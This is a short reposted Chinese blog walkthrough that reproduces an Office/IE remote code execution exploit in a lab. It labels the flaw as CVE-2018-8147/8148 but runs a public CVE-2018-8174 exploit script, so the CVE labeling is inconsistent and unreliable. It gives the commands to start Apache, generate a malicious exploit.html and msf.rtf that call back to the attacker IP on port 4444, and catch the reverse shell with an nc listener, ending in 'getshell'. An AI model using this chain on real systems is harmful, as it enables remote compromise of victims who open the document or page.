参考自:
https://www.cnblogs.com/sch01ar/p/9175578.html
漏洞名称:CVE-2018-8147 CVE-2018-8148
漏洞危害:
Microsoft Excel存在远命令码执行漏洞
影响:
Microsoft Excel 2010 Service Pack 2、Microsoft Excel 2013 Service Pack 1、Microsoft Excel 2016、Microsoft Office 2010 Service Pack 2、Microsoft Office 2013 RT Service Pack 1、Microsoft Office 2013 Service Pack 1、Microsoft Office 2016、Microsoft Office Compatibility Service Pack 3等版本均受该漏洞影响。
准备工作:
exp:https://github.com/Sch01ar/CVE-2018-8174_EXP
kail:192.168.91.150
windows:192.168.91.139
下载文件到kail解压:
service apache2 start
之后执行命令:
python CVE-2018-8174.py -u http://192.168.91.150/exploit.html -o msf.rtf -i 192.168.91.150 -p 4444
-u:URL 地址
-o:生成文档
-i:监听地址
-p:监听端口
把 生成的explot.html 复制到 /var/www/html,并开启 apache 服务
nc -lvvp 4444
监听端口
结果:
用windows打开 http://192.168.91.150/exploit.html
再看kail,已经成功getshell
如果直接在win7里面点击msf.rtf也会生成通道;
转载:https://blog.csdn.net/weixin_44897902/article/details/102573401
查看评论